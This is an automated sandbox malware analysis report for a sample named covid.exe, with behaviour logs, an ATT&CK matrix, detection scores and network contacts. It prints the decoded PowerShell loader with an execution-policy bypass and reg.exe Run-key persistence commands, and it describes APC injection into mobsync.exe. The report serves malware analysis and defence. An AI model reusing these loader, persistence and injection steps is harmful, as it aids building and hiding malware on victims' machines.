    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\covid.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4840
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4012
    Source: C:\Users\user\Desktop\covid.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996 Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605D1B8 FindFirstFileExW,13_2_00007FF68605D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW,18_2_00007FF6FE11D1B8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW,29_2_00007FF7E3D7D1B8
    Source: covid.exe, 00000000.00000002.303793186.0000000001605000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}w
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: mobsync.exe, 0000000F.00000002.320651387.0000023A00CE8000.00000004.00000020.sdmp, mobsync.exe, 00000014.00000002.340229538.0000023F814B8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF686048064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605F470 GetProcessHeap,13_2_00007FF68605F470
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,13_2_00007FF686047CB8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF686047694
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68604FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF68604FEC8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048210 SetUnhandledExceptionFilter,13_2_00007FF686048210
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,18_2_00007FF6FE107CB8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE108064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6FE108064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF6FE107694
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE10FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6FE10FEC8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE108210 SetUnhandledExceptionFilter,18_2_00007FF6FE108210
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,29_2_00007FF7E3D67CB8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D68210 SetUnhandledExceptionFilter,29_2_00007FF7E3D68210
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D68064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7E3D68064
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D6FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00007FF7E3D6FEC8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00007FF7E3D67694
    Source: C:\Users\user\Desktop\covid.exe Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    Early bird code injection technique detected
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
    Allocates memory in foreign processes
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 23A00BA0000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 23F81490000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 2212C2E0000 protect: page execute and read and write
    Bypasses PowerShell execution policy
    Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand
    Encrypted powershell cmdline option found
    Source: C:\Users\user\Desktop\covid.exe Process created: Base64 decoded $x='838c6397-aa6a-4c2e-af18-018c880c33bb';$y='C:\Users\hardz\Desktop\covid.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
    Queues an APC in another process (thread injection)
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Thread APC queued: target process: C:\Windows\System32\mobsync.exe
    Writes to foreign memory regions
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23A00BA0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23F81490000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 2212C2E0000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686065C70 cpuid 13_2_00007FF686065C70
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FF686061F44
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,13_2_00007FF686061DDC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,13_2_00007FF686061EAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW,13_2_00007FF68605EF2C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,13_2_00007FF686062398
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FF6860624C4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,13_2_00007FF686062190
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,13_2_00007FF68605E9AC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,13_2_00007FF686061A90
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00007FF6860622E8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF6FE121F44
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,18_2_00007FF6FE121DDC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,18_2_00007FF6FE121EAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW,18_2_00007FF6FE11EF2C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,18_2_00007FF6FE122398
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF6FE1224C4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,18_2_00007FF6FE11E9AC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,18_2_00007FF6FE122190
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,18_2_00007FF6FE121A90
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FF6FE1222E8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,29_2_00007FF7E3D824C4
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,29_2_00007FF7E3D82398
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_00007FF7E3D822E8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,29_2_00007FF7E3D81A90
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,29_2_00007FF7E3D7E9AC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,29_2_00007FF7E3D82190
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,29_2_00007FF7E3D81F44
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW,29_2_00007FF7E3D7EF2C
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,29_2_00007FF7E3D81EAC
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,29_2_00007FF7E3D81DDC
    Source: C:\Users\user\Desktop\covid.exe Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048288 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_00007FF686048288

    Mitre Att&ck Matrix

    | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
    | Valid Accounts | Command and Scripting Interpreter 11 | Registry Run Keys / Startup Folder 1 | Process Injection 411 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
    | Default Accounts | PowerShell 4 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Modify Registry 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
    | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Security Software Discovery 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
    | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
    | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 411 | LSA Secrets | Virtualization/Sandbox Evasion 31 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
    | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
    | External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
    | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | File and Directory Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
    | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 32 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

    Behavior Graph

    [Behavior graph] Behavior Graph ID: 379751, Sample: covid.exe, Startdate: 01/04/2021, Architecture: WINDOWS, Score: 100

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | covid.exe | 16% | Virustotal | |
    | covid.exe | 34% | ReversingLabs | Win32.Ransomware.Generic |
    | covid.exe | 100% | Avira | TR/Dropper.Gen2 |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | 0.0.covid.exe.c70000.0.unpack | 100% | Avira | TR/Dropper.Gen2 |

    Domains

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | platform.twitter.map.fastly.net | 0% | Virustotal | |
    | v1.addthisedge.com | 0% | Virustotal | |
    | www.clarity.ms | 0% | Virustotal | |
    | z.moatads.com | 1% | Virustotal | |

    URLs

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | https://contoso.com/License | 0% | URL Reputation | safe |
    | https://contoso.com/ | 0% | URL Reputation | safe |
    | https://redux.js.org/api/store#subscribelistener | 0% | Avira URL Cloud | safe |
    | http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
    | https://contoso.com/Icon | 0% | URL Reputation | safe |
    | http://fontello.comFont | 0% | URL Reputation | safe |
    | https://www.google.%/ads/ga-audiences | 0% | URL Reputation | safe |
    | http://www.wikipedia.com/ | 0% | URL Reputation | safe |

    Domains and IPs

    Contacted Domains

    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|---|---|
    | googleads.g.doubleclick.net | 172.217.168.2 | true | false | | high |
    | fontawesome-cdn.fonticons.netdna-cdn.com | 23.111.9.35 | true | false | | high |
    | platform.twitter.map.fastly.net | 199.232.136.157 | true | false | | unknown |
    | www.who.int | unknown | unknown | false | | high |
    | m.addthis.com | unknown | unknown | false | | high |
    | v1.addthisedge.com | unknown | unknown | false | | unknown |
    | www.clarity.ms | unknown | unknown | false | | unknown |
    | s7.addthis.com | unknown | unknown | false | | high |
    | z.moatads.com | unknown | unknown | false | | unknown |
    | static.doubleclick.net | unknown | unknown | false | | high |
    | use.fontawesome.com | unknown | unknown | false | | high |
    | cdn.who.int | unknown | unknown | false | | high |
    | platform.twitter.com | unknown | unknown | false | | high |
    | www.youtube.com | unknown | unknown | false | | high |
    | c.clarity.ms | unknown | unknown | false | | unknown |

    URLs from Memory and Binaries

                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://www.who.int/ru/homeFL794448.htm.7.drfalse
                                                                                                                  high
                                                                                                                  https://schema.orgFL794448.htm.7.drfalse
                                                                                                                    high
                                                                                                                    https://www.who.int/emergencies/diseases/novel-coronavirus-2019/interactive-timelineFL794448.htm.7.drfalse
                                                                                                                      high
                                                                                                                      https://www.who.int/news-room/eventsFL794448.htm.7.drfalse
                                                                                                                        high
                                                                                                                        https://www.who.int/news/item#:ItemDefaultUrlFL794448.htm.7.drfalse
                                                                                                                          high
                                                                                                                          http://youtube.com/yt/2012/10/10base[1].js.7.drfalse
                                                                                                                            high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.268280684.000001A4130EF000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.who.int/fpowershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.who.int/ictrp/search/en/FL794448.htm.7.drfalse
                                                                                                                                  high
                                                                                                                                  https://app.powerbi.com/FL794448.htm.7.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.who.int/about/what-we-do/who-brochureFL794448.htm.7.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboardFL794448.htm.7.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.%/ads/ga-audiencesanalytics[1].js.7.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        low
                                                                                                                                        https://www.who.int/about/who-we-are/privacy-policyFL794448.htm.7.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.who.int/nt/powershell.exe, 00000001.00000002.293726435.000001A42B226000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.youtube.com/videoplaybackbase[1].js.7.drfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpgFL794448.htm.7.drfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.269023751.000001A4133CC000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.who.int/campaigns/connecting-the-world-to-combat-coronavirus/how-to-report-misinformatioFL794448.htm.7.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.who.int/news-room/releasesFL794448.htm.7.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.who.int/fr/homeFL794448.htm.7.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.wikipedia.com/msapplication.xml6.6.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://covid19.who.int/FL794448.htm.7.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.live.com/msapplication.xml2.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://youtube.com/drm/2012/10/10base[1].js.7.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.emro.who.int/index.htmlFL794448.htm.7.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.pnFL794448.htm.7.drfalse
                                                                                                                                                                  high

                                                                                                                                                                  Contacted IPs


                                                                                                                                                                  Public

IP               Domain                                    Country        ASN    ASN Name                       Malicious
108.177.15.154   unknown                                   United States  15169  GOOGLEUS                       false
23.111.9.35      fontawesome-cdn.fonticons.netdna-cdn.com  United States  33438  HIGHWINDS2US                   false
172.217.168.68   unknown                                   United States  15169  GOOGLEUS                       false
13.88.21.125     unknown                                   United States  8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false
172.217.168.3    unknown                                   United States  15169  GOOGLEUS                       false
172.217.168.1    unknown                                   United States  15169  GOOGLEUS                       false
172.217.168.2    googleads.g.doubleclick.net               United States  15169  GOOGLEUS                       false
168.61.161.212   unknown                                   United States  8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false
65.9.58.114      unknown                                   United States  16509  AMAZON-02US                    false
172.217.168.54   unknown                                   United States  15169  GOOGLEUS                       false
199.232.136.157  platform.twitter.map.fastly.net           United States  54113  FASTLYUS                       false
168.62.194.64    unknown                                   United States  8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false

                                                                                                                                                                  Private

                                                                                                                                                                  IP
                                                                                                                                                                  192.168.2.1

                                                                                                                                                                  General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 379751
Start date: 01.04.2021
Start time: 08:03:32
Joe Sandbox Product: CloudBasic
